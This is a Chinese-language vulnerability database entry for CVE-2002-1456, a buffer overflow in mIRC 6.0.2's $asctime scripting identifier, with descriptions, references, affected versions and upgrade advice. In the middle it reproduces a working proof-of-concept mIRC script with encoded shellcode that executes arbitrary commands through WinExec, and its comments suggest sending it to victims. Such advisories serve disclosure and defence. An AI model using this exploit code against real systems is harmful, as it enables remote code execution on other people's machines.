CVE-2002-1456
CVSS7.5
发布时间 :2003-06-09 00:00:00
修订时间 :2016-11-28 14:06:22
NMCOES    

[原文]Buffer overflow in mIRC 6.0.2 and earlier allows remote attackers to execute arbitrary code via a long $asctime value.


[CNNVD]mIRC脚本 $asctime标识符远程缓冲区溢出漏洞(CNNVD-200306-024)

        
        mIRC是一款IRC聊天客户端。
        mIRC中的$asctime标识符在解析字符串时缺少正确检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。
        mIRC提供脚本功能来扩展客户端功能,其中$asctime脚本标识符存在漏洞,这个脚本用来格式化Unix类型时间邮戳,$asctime在处理超长字符串时缺少正确检查,可引起缓冲区溢出,通过使$asctime调用精心构建的字符串数据可能以客户端权限在系统上执行任意指令。
        mIRC默认包含的脚本不能调用$asctime,但是大多数IRC服务器提供脚本下载可以调用这个标识符。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:khaled_mardam-bey:mirc:6.0.2
cpe:/a:khaled_mardam-bey:mirc:6.0
cpe:/a:khaled_mardam-bey:mirc:6.0.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1456
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1456
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200306-024
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0092.html
(VENDOR_ADVISORY)  VULNWATCH  20020827 uuuppz.com - Advisory 002 - mIRC $asctime overflow
http://marc.info/?l=bugtraq&m=103046375002380&w=2
(UNKNOWN)  BUGTRAQ  20020827 uuuppz.com - Advisory 002 - mIRC $asctime overflow
http://marc.info/?l=ntbugtraq&m=103046138631893&w=2
(UNKNOWN)  NTBUGTRAQ  20020827 uuuppz.com - Advisory 002 - mIRC $asctime overflow
http://www.mirc.co.uk/whatsnew.txt
(UNKNOWN)  MISC  http://www.mirc.co.uk/whatsnew.txt
http://www.securityfocus.com/bid/5576
(UNKNOWN)  BID  5576
http://xforce.iss.net/xforce/xfdb/9970
(UNKNOWN)  XF  mirc-asctime-bo(9970)

- 漏洞信息

mIRC脚本 $asctime标识符远程缓冲区溢出漏洞
高危 边界条件错误
2003-06-09 00:00:00 2005-10-20 00:00:00
远程  
        
        mIRC是一款IRC聊天客户端。
        mIRC中的$asctime标识符在解析字符串时缺少正确检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。
        mIRC提供脚本功能来扩展客户端功能,其中$asctime脚本标识符存在漏洞,这个脚本用来格式化Unix类型时间邮戳,$asctime在处理超长字符串时缺少正确检查,可引起缓冲区溢出,通过使$asctime调用精心构建的字符串数据可能以客户端权限在系统上执行任意指令。
        mIRC默认包含的脚本不能调用$asctime,但是大多数IRC服务器提供脚本下载可以调用这个标识符。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时不要使用mIRC上IRC聊天。
        厂商补丁:
        Khaled Mardam-Bey
        -----------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载mIRC v6.03版本:
        
        http://www.mirc.com/

- 漏洞信息 (21759)

mIRC 6.0 Scripting ASCTime Buffer Overflow Vulnerability (EDBID:21759)
windows remote
2002-08-27 Verified
0 James Martin
N/A [点击下载]
source: http://www.securityfocus.com/bid/5576/info

mIRC is a chat client for the IRC protocol, designed for Microsoft Windows based operating systems. mIRC includes support for a scripting language.

A buffer overflow vulnerability has been reported in the $asctime identifier, a function in the mIRC scripting language. The error lies in the handling over oversized format specifier strings.

Exploitation will rely on a script passing untrusted input to this function. Reportedly, no such script is included in the default installation of mIRC. 

; Proof of concept Code for asctime exploit
; Author: James Martin
; Website: http://www.uuuppz.com
; Email: me@uuuppz.com
;
; Usage:
; /asctime_poc notepad c:\autoexec.nat
; /asctime_poc command.com /c echo Your have been rooted > c:\rooted.txt
; etc :)
;
;
/asctime_poc {
; Set Show State
;
; Valid Values:
; 1 - Show Normal (This will break a ctcp request)
; 2 - Minimise (If your being evil... ;))
; 3 - Maximise
set %showstate 2

; Build Coded Command String
set %command $1-
set %count 1
unset %codedcommand
:loop
set %codedcommand %codedcommand $+ $chr($calc(128+$asc($mid(%command, %count, 1))))
set %count $calc( %count + 1)
if %count <= $len(%command) goto loop 

; Shell Code to Execute
;
; Detects mirc version, decodes the command string then calls winexec
set %shellcode $chr(184) $+ PPP $+ $chr(255) $+ $chr(193) $+ $chr(224) $+ $chr(8) $+ $chr(193) $+ $chr(232) $+ $chr(8) $+ f $+ $chr(139) $+ $chr(24) $+ f $+ $chr(129) $+ $chr(251) $+ $chr(220) $+ qu $+ $chr(7) $+ $chr(184) $+ $chr(250) $+ $chr(253) $+ $chr(5) $+ $chr(255) $+ $chr(235) $+ $chr(19) $+ f $+ $chr(129) $+ $chr(251) $+ $str($chr(255),2) $+ u $+ $chr(7) $+ $chr(184) $+ $chr(190) $+ $chr(187) $+ $chr(4) $+ $chr(255) $+ $chr(235) $+ $chr(5) $+ $chr(184) $+ $chr(210) $+ $chr(129) $+ $chr(4) $+ $chr(255) $+ 5PPP $+ $chr(255) $+ $chr(235) $+ $chr(30) $+ Yj $+ $chr( %showstate ) $+ QIA $+ $chr(128) $+ 9 $+ $chr(255) $+ u $+ $chr(2) $+ $chr(235) $+ $chr(5) $+ $chr(128) $+ 1 $+ $chr(128) $+ $chr(235) $+ $chr(243) $+ $chr(128) $+ 1 $+ $chr(255) $+ $chr(255) $+ $chr(208) $+ ]]] $+ $chr(139) $+ $chr(229) $+ ] $+ $chr(195) $+ $chr(232) $+ $chr(221) $+ $str($chr(255),3) 

; Build Exploit String
set %exploitstring %shellcode $+ %codedcommand $+ $chr(255) $+ $str(a, $calc(300-2- $len(%command))) $+ q $+ $chr(17) $+ $chr(64) 

; Run exploit string
;
; In the real world it would be more like
; /msg muppet weirdcommand %exploitstring
echo 1 $asctime(%exploitstring)
}
		

- 漏洞信息

6405
mIRC asctime Input Overflow
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in mIRC. mIRC fails to limit paramters given to asctime(), resulting in a buffer overflow. With a specially crafted request, an attacker can cause the target machine to execute arbitrary code resulting in a loss of confidentiality and integrity.

- 时间线

2002-08-16 2002-07-30
2002-08-16 Unknow

- 解决方案

Upgrade to version 6.03 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): Disable scripts or check input on functions that use the asctime() function.

- 相关参考

- 漏洞作者

- 漏洞信息

mIRC Scripting ASCTime Buffer Overflow Vulnerability
Boundary Condition Error 5576
Yes No
2002-08-27 12:00:00 2009-07-11 03:56:00
Discovered by "James Martin" <fulldisclose@uuuppz.com>.

- 受影响的程序版本

Khaled Mardam-Bey mIRC 6.0 2
Khaled Mardam-Bey mIRC 6.0 1
Khaled Mardam-Bey mIRC 6.0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
Khaled Mardam-Bey mIRC 6.0 3

- 不受影响的程序版本

Khaled Mardam-Bey mIRC 6.0 3

- 漏洞讨论

mIRC is a chat client for the IRC protocol, designed for Microsoft Windows based operating systems. mIRC includes support for a scripting language.

A buffer overflow vulnerability has been reported in the $asctime identifier, a function in the mIRC scripting language. The error lies in the handling over oversized format specifier strings.

Exploitation will rely on a script passing untrusted input to this function. Reportedly, no such script is included in the default installation of mIRC.

- 漏洞利用

A proof of concept exploit has been provided by James Martin &lt;fulldisclose@uuuppz.com&gt;:

- 解决方案

An updated version of mIRC is available:


Khaled Mardam-Bey mIRC 6.0

Khaled Mardam-Bey mIRC 6.0 2

Khaled Mardam-Bey mIRC 6.0 1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站